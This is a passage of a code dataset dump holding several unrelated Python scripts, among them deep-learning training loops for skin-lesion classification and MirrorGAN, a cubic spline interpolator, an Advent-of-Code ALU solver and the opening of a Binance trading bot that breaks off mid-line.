chainer.training.Trainer(updater, (args.epoch, 'epoch'), args.out)\n\n trainer.extend(extensions.LogReport())\n trainer.extend(chainer.training.extensions.ProgressBar(update_interval=10))\n\n print('@A')\n trainer.run()\n\n # save model\n output_file_path = '{0}/triplet_net_{1}_{2}.model'.format(args.out, args.batchsize, args.epoch)\n chainer.serializers.save_npz(output_file_path, tn)\n","sub_path":"src/run_triplet.py","file_name":"run_triplet.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"226483602","text":"from mpl_toolkits import mplot3d\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\n\n#SCATTER PLOT\n# z_line = np.linspace(0, 15, 1000)\n# x_line = np.cos(z_line)\n# y_line = np.sin(z_line)\n# ax.plot3D(x_line, y_line, z_line, 'gray')\n#\n# z_points = 15 * np.random.random(100)\n# x_points = np.cos(z_points) + 0.1 * np.random.randn(100)\n# y_points = np.sin(z_points) + 0.1 * np.random.randn(100)\n# ax.scatter3D(x_points, y_points, z_points, c=z_points, cmap='hsv');\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nimport matplotlib.pyplot as plt\n#fig = plt.figure()\n#ax = Axes3D(fig)\nx = [0,0.2,0.2,0]\ny = [0,0,0.2,0.2]\nz = [0,0,0.2,0.2]\n\n\nA=np.array([x,y,z])\n\n\na= 1\nverts=None\nvert2=None\nwhile a <= 4:\n print (a)\n a+=0.05\n\n\n verts = [list(zip(x,y,z))]\n print(\"verts\", verts)\n\n if vert2:\n print(\"vert2\", vert2)\n #ax.remove_collection3d(Poly3DCollection(vert2))\n if a <=2:\n #SHEAR TRANSFORM.\n S=np.matrix([[a,0,0],[0,1,0],[0,0,1]])\n V=np.dot(S,A)\n list1 = V.tolist()\n\n if a >2 and a <3:\n #ROTATION TRANSFORM.\n theta = a* np.pi/180\n Rz = np.array([[np.cos(theta), -np.sin(theta), 0.0], [np.sin(theta), np.cos(theta), 0.0],[0.0,0.0, 1.0],])\n A= Rz @ A\n list1=A.tolist()\n\n if a >=3 and a<3.5:\n #TRANSLATE TRANSFORM.\n Ty= np.matrix([[0,0,0,0],[a-3,a-3,a-3,a-3],[0,0,0,0]])\n A=A + Ty\n list1=A.tolist()\n\n print (list1[0][1])\n x = list1[0]\n y = list1[1]\n z = list1[2]\n vert2 = [list(zip(x,y,z))]\n print (vert2)\n ax.add_collection3d(Poly3DCollection(vert2))\n plt.draw()\n plt.pause(0.001)\n","sub_path":"3dplots.py","file_name":"3dplots.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"341538895","text":"import os\nimport csv\nimport random\nimport argparse\nimport numpy as np\nfrom tensorboardX import SummaryWriter\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as lr_scheduler\nimport torchvision\nimport torchvision.utils as utils\nimport torchvision.transforms as torch_transforms\nfrom networks import AttnVGG\nfrom loss import FocalLoss, DiceLoss\nfrom data import preprocess_data_2016, preprocess_data_2017, ISIC\nfrom utilities import *\nfrom transforms import *\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\ntorch.backends.cudnn.benchmark = True\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndevice_ids = [0]\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--preprocess\", action='store_true', help=\"run preprocess_data\")\nparser.add_argument(\"--dataset\", type=str, default=\"ISIC2017\", help='ISIC2017 / ISIC2016')\nparser.add_argument(\"--seg\", type=str, default=\"lesion\", help='lesion / dermo')\n\nparser.add_argument(\"--batch_size\", type=int, default=32, help=\"batch size\")\nparser.add_argument(\"--epochs\", type=int, default=50, help=\"number of epochs\")\nparser.add_argument(\"--lr\", type=float, default=0.01, help=\"initial learning rate\")\nparser.add_argument(\"--outf\", type=str, default=\"logs\", help='path of log files')\nparser.add_argument(\"--base_up_factor\", type=int, default=8, help=\"upsample ratio for attention visualization\")\n\nparser.add_argument(\"--normalize_attn\", action='store_true', help='if True, attention map is normalized by softmax; otherwise use sigmoid')\nparser.add_argument(\"--focal_loss\", action='store_true', help='turn on focal loss (otherwise use cross entropy loss)')\nparser.add_argument(\"--no_attention\", action='store_true', help='turn off attention')\nparser.add_argument(\"--over_sample\", action='store_true', help='offline oversampling')\nparser.add_argument(\"--log_images\", action='store_true', help='visualze images in Tensoeboard')\n\nopt = parser.parse_args()\n\ndef _worker_init_fn_():\n torch_seed = torch.initial_seed()\n np_seed = torch_seed // 2**32-1\n random.seed(torch_seed)\n np.random.seed(np_seed)\n\ndef main():\n # load data\n print('\\nloading the dataset ...')\n assert opt.dataset == \"ISIC2016\" or opt.dataset == \"ISIC2017\"\n if opt.dataset == \"ISIC2016\":\n num_aug = 5\n normalize = Normalize((0.7012, 0.5517, 0.4875), (0.0942, 0.1331, 0.1521))\n elif opt.dataset == \"ISIC2017\":\n num_aug = 2\n normalize = Normalize((0.6820, 0.5312, 0.4736), (0.0840, 0.1140, 0.1282))\n if opt.over_sample:\n print('data is offline oversampled ...')\n train_file = 'train_oversample.csv'\n else:\n print('no offline oversampling ...')\n train_file = 'train.csv'\n im_size = 224\n transform_train = torch_transforms.Compose([\n RatioCenterCrop(0.8),\n Resize((256,256)),\n RandomCrop((224,224)),\n RandomRotate(),\n RandomHorizontalFlip(),\n RandomVerticalFlip(),\n ToTensor(),\n normalize\n ])\n transform_val = torch_transforms.Compose([\n RatioCenterCrop(0.8),\n Resize((256,256)),\n CenterCrop((224,224)),\n ToTensor(),\n normalize\n ])\n trainset = ISIC(csv_file=train_file, transform=transform_train)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=opt.batch_size, shuffle=True,\n num_workers=8, worker_init_fn=_worker_init_fn_(), drop_last=True)\n valset = ISIC(csv_file='val.csv', transform=transform_val)\n valloader = torch.utils.data.DataLoader(valset, batch_size=64, shuffle=False, num_workers=8)\n print('done\\n')\n\n # load models\n print('\\nloading the model ...')\n\n if not opt.no_attention:\n print('turn on attention ...')\n if opt.normalize_attn:\n print('use softmax for attention map ...')\n else:\n print('use sigmoid for attention map ...')\n else:\n print('turn off attention ...')\n\n net = AttnVGG(num_classes=2, attention=not opt.no_attention, normalize_attn=opt.normalize_attn)\n dice = DiceLoss()\n if opt.focal_loss:\n print('use focal loss ...')\n criterion = FocalLoss(gama=2., size_average=True, weight=None)\n else:\n print('use cross entropy loss ...')\n criterion = nn.CrossEntropyLoss()\n print('done\\n')\n\n # move to GPU\n print('\\nmoving models to GPU ...')\n model = nn.DataParallel(net, device_ids=device_ids).to(device)\n criterion.to(device)\n dice.to(device)\n print('done\\n')\n\n # optimizer\n optimizer = optim.SGD(model.parameters(), lr=opt.lr, momentum=0.9, weight_decay=1e-4, nesterov=True)\n lr_lambda = lambda epoch : np.power(0.1, epoch//10)\n scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lr_lambda)\n\n # training\n print('\\nstart training ...\\n')\n step = 0\n EMA_accuracy = 0\n AUC_val = 0\n writer = SummaryWriter(opt.outf)\n if opt.log_images:\n data_iter = iter(valloader)\n fixed_batch = next(data_iter)\n fixed_batch = fixed_batch['image'][0:16,:,:,:].to(device)\n for epoch in range(opt.epochs):\n torch.cuda.empty_cache()\n # adjust learning rate\n scheduler.step()\n current_lr = optimizer.param_groups[0]['lr']\n writer.add_scalar('train/learning_rate', current_lr, epoch)\n print(\"\\nepoch %d learning rate %f\\n\" % (epoch+1, current_lr))\n # run for one epoch\n for aug in range(num_aug):\n for i, data in enumerate(trainloader, 0):\n # warm up\n model.train()\n model.zero_grad()\n optimizer.zero_grad()\n inputs, seg, labels = data['image'], data['image_seg'], data['label']\n seg = seg[:,-1:,:,:]\n seg_1 = F.adaptive_avg_pool2d(seg, im_size//opt.base_up_factor)\n seg_2 = F.adaptive_avg_pool2d(seg, im_size//opt.base_up_factor//2)\n inputs, seg_1, seg_2, labels = inputs.to(device), seg_1.to(device), seg_2.to(device), labels.to(device)\n # forward\n pred, a1, a2 = model(inputs)\n # backward\n loss_c = criterion(pred, labels)\n loss_seg1 = dice(a1, seg_1)\n loss_seg2 = dice(a2, seg_2)\n loss = loss_c + 0.001 * loss_seg1 + 0.01 * loss_seg2\n loss.backward()\n optimizer.step()\n # display results\n if i % 10 == 0:\n model.eval()\n pred, __, __ = model(inputs)\n predict = torch.argmax(pred, 1)\n total = labels.size(0)\n correct = torch.eq(predict, labels).sum().double().item()\n accuracy = correct / total\n EMA_accuracy = 0.9*EMA_accuracy + 0.1*accuracy\n writer.add_scalar('train/loss_c', loss_c.item(), step)\n writer.add_scalar('train/loss_seg1', loss_seg1.item(), step)\n writer.add_scalar('train/loss_seg2', loss_seg2.item(), step)\n writer.add_scalar('train/accuracy', accuracy, step)\n writer.add_scalar('train/EMA_accuracy', EMA_accuracy, step)\n print(\"[epoch %d][aug %d/%d][iter %d/%d] loss_c %.4f loss_seg1 %.4f loss_seg2 %.4f accuracy %.2f%% EMA %.2f%%\"\n % (epoch+1, aug+1, num_aug, i+1, len(trainloader), loss_c.item(), loss_seg1.item(), loss_seg2.item(), (100*accuracy), (100*EMA_accuracy)))\n step += 1\n # the end of each epoch - validation results\n model.eval()\n total = 0\n correct = 0\n with torch.no_grad():\n with open('val_results.csv', 'wt', newline='') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter=',')\n for i, data in enumerate(valloader, 0):\n images_val, labels_val = data['image'], data['label']\n images_val, labels_val = images_val.to(device), labels_val.to(device)\n pred_val, __, __ = model(images_val)\n predict = torch.argmax(pred_val, 1)\n total += labels_val.size(0)\n correct += torch.eq(predict, labels_val).sum().double().item()\n # record predictions\n responses = F.softmax(pred_val, dim=1).squeeze().cpu().numpy()\n responses = [responses[i] for i in range(responses.shape[0])]\n csv_writer.writerows(responses)\n AP, AUC, precision_mean, precision_mel, recall_mean, recall_mel = compute_metrics('val_results.csv', 'val.csv')\n # save checkpoints\n print('\\nsaving checkpoints ...\\n')\n checkpoint = {\n 'state_dict': model.module.state_dict(),\n 'opt_state_dict': optimizer.state_dict(),\n }\n torch.save(checkpoint, os.path.join(opt.outf, 'checkpoint_latest.pth'))\n if AUC > AUC_val: # save optimal validation model\n torch.save(checkpoint, os.path.join(opt.outf,'checkpoint.pth'))\n AUC_val = AUC\n # log scalars\n writer.add_scalar('val/accuracy', correct/total, epoch)\n writer.add_scalar('val/mean_precision', precision_mean, epoch)\n writer.add_scalar('val/mean_recall', recall_mean, epoch)\n writer.add_scalar('val/precision_mel', precision_mel, epoch)\n writer.add_scalar('val/recall_mel', recall_mel, epoch)\n writer.add_scalar('val/AP', AP, epoch)\n writer.add_scalar('val/AUC', AUC, epoch)\n print(\"\\n[epoch %d] val result: accuracy %.2f%%\" % (epoch+1, 100*correct/total))\n print(\"\\nmean precision %.2f%% mean recall %.2f%% \\nprecision for mel %.2f%% recall for mel %.2f%%\" %\n (100*precision_mean, 100*recall_mean, 100*precision_mel, 100*recall_mel))\n print(\"\\nAP %.4f AUC %.4f\\n optimal AUC: %.4f\" % (AP, AUC, AUC_val))\n # log images\n if opt.log_images:\n print('\\nlog images ...\\n')\n I_train = utils.make_grid(inputs[0:16,:,:,:], nrow=4, normalize=True, scale_each=True)\n I_seg_1 = utils.make_grid(seg_1[0:16,:,:,:], nrow=4, normalize=True, scale_each=True)\n I_seg_2 = utils.make_grid(seg_2[0:16,:,:,:], nrow=4, normalize=True, scale_each=True)\n writer.add_image('train/image', I_train, epoch)\n writer.add_image('train/seg1', I_seg_1, epoch)\n writer.add_image('train/seg2', I_seg_2, epoch)\n if epoch == 0:\n I_val = utils.make_grid(fixed_batch, nrow=4, normalize=True, scale_each=True)\n writer.add_image('val/image', I_val, epoch)\n if opt.log_images and (not opt.no_attention):\n print('\\nlog attention maps ...\\n')\n # training data\n __, a1, a2 = model(inputs[0:16,:,:,:])\n if a1 is not None:\n attn1 = visualize_attn(I_train, a1, up_factor=opt.base_up_factor, nrow=4)\n writer.add_image('train/attention_map_1', attn1, epoch)\n if a2 is not None:\n attn2 = visualize_attn(I_train, a2, up_factor=2*opt.base_up_factor, nrow=4)\n writer.add_image('train/attention_map_2', attn2, epoch)\n # val data\n __, a1, a2 = model(fixed_batch)\n if a1 is not None:\n attn1 = visualize_attn(I_val, a1, up_factor=opt.base_up_factor, nrow=4)\n writer.add_image('val/attention_map_1', attn1, epoch)\n if a2 is not None:\n attn2 = visualize_attn(I_val, a2, up_factor=2*opt.base_up_factor, nrow=4)\n writer.add_image('val/attention_map_2', attn2, epoch)\n\nif __name__ == \"__main__\":\n if opt.preprocess:\n assert opt.seg == \"lesion\" or opt.seg == \"dermo\"\n if opt.dataset == \"ISIC2016\":\n preprocess_data_2016(root_dir='../data_2016')\n elif opt.dataset == \"ISIC2017\":\n if opt.seg == 'lesion':\n preprocess_data_2017(root_dir='../data_2017', seg_dir='Train_Lesion')\n elif opt.seg == 'dermo':\n preprocess_data_2017(root_dir='../data_2017', seg_dir='Train_Dermo')\n main()\n","sub_path":"train_seg.py","file_name":"train_seg.py","file_ext":"py","file_size_in_byte":12480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"568080572","text":"# File: main.py\n# -------------\n# The script where the program state is set and the\n# desired commands are run.\n\nimport argparse\nimport torch\n\nimport models\nimport constants\nimport train_utils\nimport data_utils\nimport utils\n\ndef get_arguments():\n '''\n Function to parse the command line arguments and return them\n as an \n '''\n # Initialize the parser\n parser = argparse.ArgumentParser(description=\"Text-to-Image Synthesis with MirrorGAN\")\n\n # Task options\n parser.add_argument(\"--pretrain\", action='store_true',\n help=\"if set, we will pretrain the DAMSM model\")\n parser.add_argument(\"--validate\", action='store_true')\n parser.add_argument(\"--mirrorgan\", action='store_true')\n\n # Training options\n parser.add_argument(\"--batch_size\", type=int, default=constants.BATCH_SIZE,\n help=\"batch_size: Batch size used for training and evaluation\")\n parser.add_argument(\"--num_workers\", type=int, default=constants.NUM_WORKERS,\n help=\"num_workers: Number of data loader workers\")\n parser.add_argument('--start_epoch', type=int, default=constants.START_EPOCH,\n help=\"The epoch to start at if resuming training\")\n parser.add_argument(\"--epochs\", type=int, default=constants.EPOCHS,\n help=\"epochs: Number of epochs to train the model\")\n parser.add_argument(\"--save_every\", type=int, default=constants.SAVE_EVERY)\n parser.add_argument(\"--damsm_lr\", type=float, default=constants.DAMSM_LR,\n help=\"damsm_lr: learning rate for DAMSM training\")\n parser.add_argument(\"--caption_lr\", type=float, default=constants.CAPTION_LR)\n parser.add_argument(\"--gen_lr\", type=float, default=constants.GEN_LR)\n parser.add_argument(\"--disc_lr\", type=float, default=constants.DISC_LR) \n parser.add_argument(\"--gamma_1\", type=float, default=constants.GAMMA_1)\n parser.add_argument(\"--gamma_2\", type=float, default=constants.GAMMA_2)\n parser.add_argument(\"--gamma_3\", type=float, default=constants.GAMMA_3)\n parser.add_argument(\"--lmbda\", type=float, default=constants.LAMBDA)\n\n # Experiment options\n parser.add_argument(\"--exp_name\", type=str, help=\"exp_name: Name of experiment\")\n parser.add_argument(\"--damsm_name\", type=str, default=constants.DAMSM_NAME,\n help=\"damsm_folder: Name of the experiment from which the DAMSM module is loaded\")\n parser.add_argument(\"--damsm_load_epoch\", type=int, default=constants.DAMSM_LOAD_EPOCH,\n help=\"Specify which epoch of training we wish to load from. -1 indicates fresh start\")\n parser.add_argument(\"--caption_name\", type=str, default=constants.CAPTION_NAME,\n help=\"caption_name: Name of the experiment from which the image captioner will be loaded\")\n parser.add_argument(\"--caption_load_epoch\", type=int, default=constants.CAPTION_LOAD_EPOCH)\n parser.add_argument(\"--inception_model_path\", type=str, default=constants.INCEPTION_MODEL_PATH)\n parser.add_argument(\"--inception_load_epoch\", type=int, default=constants.INCEPTION_LOAD_EPOCH) \n parser.add_argument(\"--load_epoch\", type=int, default=constants.LOAD_EPOCH,\n help=\"Similar to damsm_load_epoch\")\n parser.add_argument(\"--seed\", type=int, default=constants.SEED,\n help=\"seed: Random seed for the experiment\")\n\n # Architecture options\n # Text encoder options\n parser.add_argument(\"--embed_size\", type=int, default=constants.EMBED_SIZE,\n help=\"embed_dim: The dimension of the word embeddings\")\n parser.add_argument(\"--dropout_prob\", type=float, default=constants.DROPOUT_PROB,\n help=\"drop_prob: Dropout probability\")\n parser.add_argument(\"--num_encoder_layers\", type=int, default=constants.NUM_ENCODER_LAYERS,\n help=\"n_encoder_layers: Number of hidden layers in the encoder LSTM\")\n parser.add_argument(\"--encoding_size\", type=int, default=constants.ENCODING_SIZE,\n help=\"encoding_size: The dimension of a word-encoding (D)\")\n parser.add_argument(\"--weight_range\", type=float, default=constants.WEIGHT_RANGE,\n help=\"encoder_init_range: The range with which the encoder will be initialized\")\n parser.add_argument(\"--ca_size\", type=int, default=constants.CA_SIZE,\n help=\"ca_size: The dimension of the conditioning augmentation sentence encoding\")\n parser.add_argument(\"--in_channels\", type=int, default=constants.IN_CHANNELS,\n help=\"in_channels: Base number of feature maps used in the generator\")\n parser.add_argument(\"--z_size\", type=int, default=constants.Z_SIZE,\n help=\"z_size: Dimension of the z noise\")\n parser.add_argument(\"--discriminator_filters\", type=int, default=constants.DISCRIMINATOR_FILTERS,\n help=\"discriminator_filters: Base number of feature maps in the discriminators\") \n parser.add_argument(\"--caption_embedding_size\", type=int, default=constants.CAPTION_EMBEDDING_SIZE)\n parser.add_argument(\"--caption_hidden_size\", type=int, default=constants.CAPTION_HIDDEN_SIZE)\n parser.add_argument(\"--caption_num_layers\", type=int, default=constants.CAPTION_NUM_LAYERS) \n\n args = parser.parse_args()\n augment_args(args)\n return args\n\ndef augment_args(args):\n '''\n We treat args like a state dictionary. All features that cannot be specified\n as arguments will be added here\n '''\n args.device = torch.device('cuda:0') if torch.cuda.is_available()\\\n else torch.device('cpu')\n\nif __name__ == '__main__':\n torch.backends.cudnn.benchmark = True\n torch.backends.cudnn.enabled = True\n\n args = get_arguments()\n\n # Initialize experiment (seeds, folders, and logging)\n utils.initialize_experiment(args)\n\n # Get dataloader/dataset. Make sure what's going on here after implementation\n split = 'test' if args.validate else 'train'\n dataloader = data_utils.get_dataloader(args, split=split)\n\n # Initialize models\n model = models.initialize_models(args)\n\n # More options here, to be updated\n if args.pretrain and not args.mirrorgan:\n train_utils.damsm_main(args, model, dataloader)\n elif args.pretrain and args.mirrorgan:\n train_utils.caption_main(args, model, dataloader)\n else:\n train_utils.generator_main(args, model, dataloader)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"228749646","text":"import os\nfrom collections import deque\n\n\nclass ArithmeticLogicUnit:\n def __init__(self, instructions: list[str]) -> None:\n self.instructions = instructions\n self.inputs = None\n self.w = 0\n self.x = 0\n self.y = 0\n self.z = 0\n\n def get(self, name: str):\n if name in {\"w\", \"x\", \"y\", \"z\"}:\n return getattr(self, name)\n else:\n return int(name)\n\n def run(self, inputs: deque):\n self.inputs = inputs\n for ins in self.instructions:\n ins_code, *args = ins.split()\n getattr(self, ins_code)(*args)\n\n def inp(self, a):\n setattr(self, a, self.inputs.popleft())\n\n def add(self, a, b):\n setattr(self, a, getattr(self, a) + self.get(b))\n\n def mul(self, a, b):\n setattr(self, a, getattr(self, a) * self.get(b))\n\n def div(self, a, b):\n setattr(self, a, getattr(self, a) // self.get(b))\n\n def mod(self, a, b):\n setattr(self, a, getattr(self, a) % self.get(b))\n\n def eql(self, a, b):\n setattr(self, a, int(getattr(self, a) == self.get(b)))\n\n\ndef get_constraints(instructions):\n constraints = []\n stack = deque()\n line = 0\n\n for i in range(14):\n line += 4\n op = instructions[line].rstrip()\n\n assert op.startswith(\"div z \"), f'Invalid input! \"{op}\", \"{line}\"'\n\n if op == \"div z 1\": # first kind of chunk\n line += 11\n op = instructions[line]\n line += 3\n assert op.startswith(\"add y \"), \"Invalid input!\"\n\n a = int(op.split()[-1]) # first constant to add\n stack.append((i, a))\n else: # second kind of chunk\n line += 1\n op = instructions[line]\n line += 13\n assert op.startswith(\"add x \"), \"Invalid input!\"\n\n b = int(op.split()[-1]) # second constant to add\n j, a = stack.pop()\n constraints.append((i, j, a + b)) # digits[j] - digits[i] must equal a + b\n\n return constraints\n\n\ndef find_max(constraints):\n digits = [0] * 14\n\n for i, j, diff in constraints:\n if diff > 0:\n digits[i], digits[j] = 9, 9 - diff\n else:\n digits[i], digits[j] = 9 + diff, 9\n\n # Compute the actual number from its digits.\n num = 0\n for d in digits:\n num = num * 10 + d\n\n return num\n\n\ndef run(inputs):\n lines = inputs.split(os.linesep)\n alu = ArithmeticLogicUnit(lines)\n\n constraints = get_constraints(lines)\n max_num = find_max(constraints)\n deq = deque([int(i) for i in str(max_num)])\n\n alu.run(deq)\n assert alu.z == 0\n\n return max_num\n","sub_path":"2021/24/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"289151249","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom integration import n, n_1d\n\n# Create x and n lists for plotting.\nx_range = [1.e-4, 1.e-2, 1.e-1, 1, 5]\nn_x = []\n\n# Append values and save them for plotting.\nfor i in range(len(x_range)):\n n_x.append(n(x_range[i]))\n\n# Define the natural cubic spline method.\ndef cubic_spline(x, y, N):\n \"\"\"\n x ... input x value\n y ... funtion of x\n N ... number of fits (bigger the more accurate but slower)\n\n Choose interpolation method to be cubic spline.\n Natural cubic spline is a piece-wise interpolation method with low-degree polynomials, which will prevent excessive oscillations\n and non-convergence. In this problem, we have nearly a linear log fit and the number of data points is only 5, meaning that the\n degree of polynomials will be low and the interpolation will be relatively accurate.\n The goal of cubic spline interpolation is to get an interpolation formula that is smooth in the first derivative and continuous\n in the second derivative, both within an interval and at its boundaries.\n \"\"\"\n\n # Initial setup.\n n = len(x)\n f = np.zeros(n)\n u = np.zeros(n)\n\n # The formula goes to N-2, so extend two more datapoints.\n xout = np.zeros(N+2)\n yout = np.zeros(N+2)\n\n # In case that besides the tabulated values of y_i, there are also tabulated values for the function’s second derivatives,\n # then we can add a cubic polynomial whose second derivative varies linearly from a value dy_j/dx on the left to a value d2y_j/dx2.\n # This will give us a continuous second derivative.\n\n # Define a polynomial to fit up to n orders that has zeros values at x_j and x_j+1.\n # This will prevent us from spoiling the the agreement with the tabulated functional values\n # y_j and y_j+1 at endpoints x_j and x_j+1.\n poly_nd = (y[n-1] - y[n-2])/(x[n-1] - x[n-2]) - (y[n-2] - y[n-3])/(x[n-2] -\n x[n-3]) + (y[n-1] - y[n-3])/(x[n-1] - x[n-3])\n\n # Decomposition loop, acquired from page 121 and 122.\n for i in range(1, n-1):\n sigma = (x[i] - x[i-1])/(x[i+1] - x[i-1])\n P = sigma*f[i-1] + 2.\n f[i] = (sigma - 1.)/P\n u[i] = (y[i+1] - y[i])/(x[i+1] - x[i]) - (y[i] - y[i-1])/(x[i] - x[i-1])\n u[i] = (6.*u[i]/(x[i + 1] - x[i - 1]) - sigma*u[i - 1])/P\n qn = 0.5\n un = (3./(x[n-1]-x[n-2]))*(poly_nd-(y[n-1]-y[n-2])/(x[n-1]-x[n-2]))\n\n # Fit the curve.\n f[n-1] = (un - qn*u[n-2])/(qn*f[n-2] + 1.)\n\n # Return the second derivative.\n for k in range(n-2, 1, -1):\n f[k] = f[k]*f[k+1] + u[k]\n\n # Initialization ends, begin interpolaton.\n for i in range(1, N+2):\n xout[i] = x[0] + (x[n-1] - x[0])*(i-1)/(N)\n\n # Use bisection method to find the interval between x_j and x_{j+1}.\n j = 0; j_plus_1 = n-1\n while (j_plus_1 - j >1):\n k = (j_plus_1 + j) >> 1\n if (x[k] > xout[i]):\n j_plus_1 = k\n else:\n j = k\n\n if (x[k] > xout[i]):\n j_plus_1 = k\n else:\n j = k\n\n # Apply the interpolation formula.\n h = x[j_plus_1] - x[j]\n A = (x[j_plus_1] - xout[i])/h\n B = (xout[i] - x[j])/h\n C = (A**3-A)*(h**2)/6.\n D = (B**3-B)*(h**2)/6.\n yout[i] = A*y[j] + B*y[j_plus_1] + C*f[j] + D*f[j_plus_1]\n\n # The first index of the output will be zero since everything starts there,\n # so taking the index number starting from one.\n return xout[1:], yout[1:]\n\n# Perform interpolation.\ninterp_density = cubic_spline(x_range, n_x, 1000)\n\n# Plot log-log of n(x) and its interplolation.\nplt.xlabel('log(x)')\nplt.ylabel('log(n)')\nplt.xscale('log') # log scale for x\nplt.yscale('log') # log scale for y\nplt.scatter(x_range, n_x, alpha=0.5, label='Data Points')\nplt.plot(interp_density[0], interp_density[1], 'r', label='Interplolation')\nplt.legend()\nplt.savefig('./plots/interpolation.png')\nplt.close()\n\n# Save as a text file.\nnp.savetxt('density_profile.txt', np.transpose([x_range, n_x]))\n","sub_path":"Hand_in_exercise_1/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"409731114","text":"N = int(input())\na = [None] * 145\nfor i in range(N):\n x = int(input())\n if a[x%144] == None:\n a[x%144] = x\n elif x < a[x%144]:\n a[x%144] = x\nmin = 1200 * 144 + 1\nfor i in range(122):\n if a[i] != None and a[144-i] != None:\n x = a[i] + a[144-i]\n if x < min and a[i] < a[144-i]:\n min = x\nif min == 1200 * 144 + 1: min == 0\nprint(min)\n \n \n \n","sub_path":"ex_27_exam/27(4).py","file_name":"27(4).py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"532093267","text":"#!/usr/bin/python\nfrom pymongo import Connection\n\ncats = Connection('10.0.0.8:27017').rynok.Category\n\ndef update(root_id=0, url=''):\n\n for cat in cats.find({\"ParentID\": root_id}):\n cat[\"URL\"] = url + '/' + cat[\"Translited\"].replace(\",\", \"\").replace(\"/\", \"\")\n cats.save(cat) \n update(cat[\"ID\"], cat[\"URL\"])\n\n return\n\nupdate()\n","sub_path":"ry/trunk-ry/rynok/other/update_url_cats.py","file_name":"update_url_cats.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"297949625","text":"#! /usr/bin/env python3\n\nimport sys\nimport os\nimport json\nimport time\n\nimport calls\nimport TradeIndicators\nimport Trading_Bot\n\n\n## This creates file paths.\nver = 6.5\ntraderBot = []\nextra_directory = (\"{0}/extra/\".format(os.getcwd()))\nsettings_file_path = (\"{0}settings.json\".format(extra_directory))\n\n## This creates the setting file if it was not found.\ndef initial_setup():\n\n\tif not os.path.isdir(extra_directory):\n\t\tos.mkdir(extra_directory)\n\n\tsettingFileDate = '{\"Currency_Allowed\" : 0.002,\\n\"Market\" : \"BTC-LTC\",\\n\"Time_Interval\" : \"5m\",\\n\"Keys\": {\"Public\" : \"None\",\\n\\t\"Secret\" : \"None\"}\\n}'\n\n\tlogFile = open(settings_file_path, 'w')\n\tlogFile.write(settingFileDate)\n\tlogFile.close()\n\n\ndef setup():\n\t## This sets up the traders and also formats the markets.\n\tglobal traderBot\n\n\tif not os.path.isfile(settings_file_path):\n\t\tsys.exit(\"There was an error reading settings file, try ./run init\")\n\n\t## This section is for reading data from the settings file and storing it.\n\tsettings_file = open(settings_file_path, 'r')\n\tsettings_file_data = json.loads(settings_file.read())\n\tsettings_file.close()\n\n\t## Start for settings file variable.\n\tTime_Interval = settings_file_data['Time_Interval']\n\tMarket = settings_file_data['Market'].upper()\n\tCurrency_Allowed = settings_file_data[\"Currency_Allowed\"]\n\tPKEY = settings_file_data['Keys']['Public']\n\tSKEY = settings_file_data['Keys']['Secret']\n\t## End of Custome Setting Variables ##\n\n\tprint(\"Binance Trader, Version: {0}, Time int: {1}, Market: {2}\".format(ver, Time_Interval, Market))\n\n\ttraderBot = Trading_Bot.trader(PKEY, SKEY, Market, float(Currency_Allowed), Time_Interval)\n\n\ndef run_bots():\n\t## This is the main calling section for the traders.\n\tforceUpdate = True\n\tmaxCycle = 10\n\tcycle = maxCycle-1\n\n\twhile True:\n\n\t\ttraderBot.update(forceUpdate)\n\n\t\tif not(forceUpdate):\n\t\t\ttraderBot.main()\n\n\t\tforceUpdate=False\n\n\t\ttime.sleep(3.4)\n\t\tif cycle == maxCycle:\n\t\t\tprint(\"]-------------------------------------------------[\")\n\t\t\tprint_data(traderBot.get_bot_info())\n\t\t\tprint(\"]-------------------------------------------------[\\n\\n\")\n\t\t\tcycle = 0\n\t\telse:\n\t\t\tcycle += 1\n\n\ndef print_data(data):\n\tMACD \t= data[\"Ind\"][\"MACD\"]\n\tprecis \t= data[\"MR\"][\"TICK_SIZE\"]\n\n\tprint(\"Market: {1} | overall: {2:.{0}f} | #Trades {3} | left: {4:.6f}\".format(precis, data[\"market\"], data[\"TS\"][\"overall\"], data[\"TS\"][\"#Trades\"], data[\"currencyLeft\"]))\n\t\n\tif data[\"status\"] == \"STANDBY_ERROR\":\n\t\tprint(\"[STATUS] Data Error, trying to fix... | lastUpdate: {0}\".format(data[\"time\"]))\n\t\t\n\telse:\n\t\tmarketTrade = \"Sell: {0}\".format(data[\"CTI\"][\"tradeTypes\"][\"S\"]) if str(data[\"CTI\"][\"tradeTypes\"][\"B\"]) == \"None\" else \"Buy: 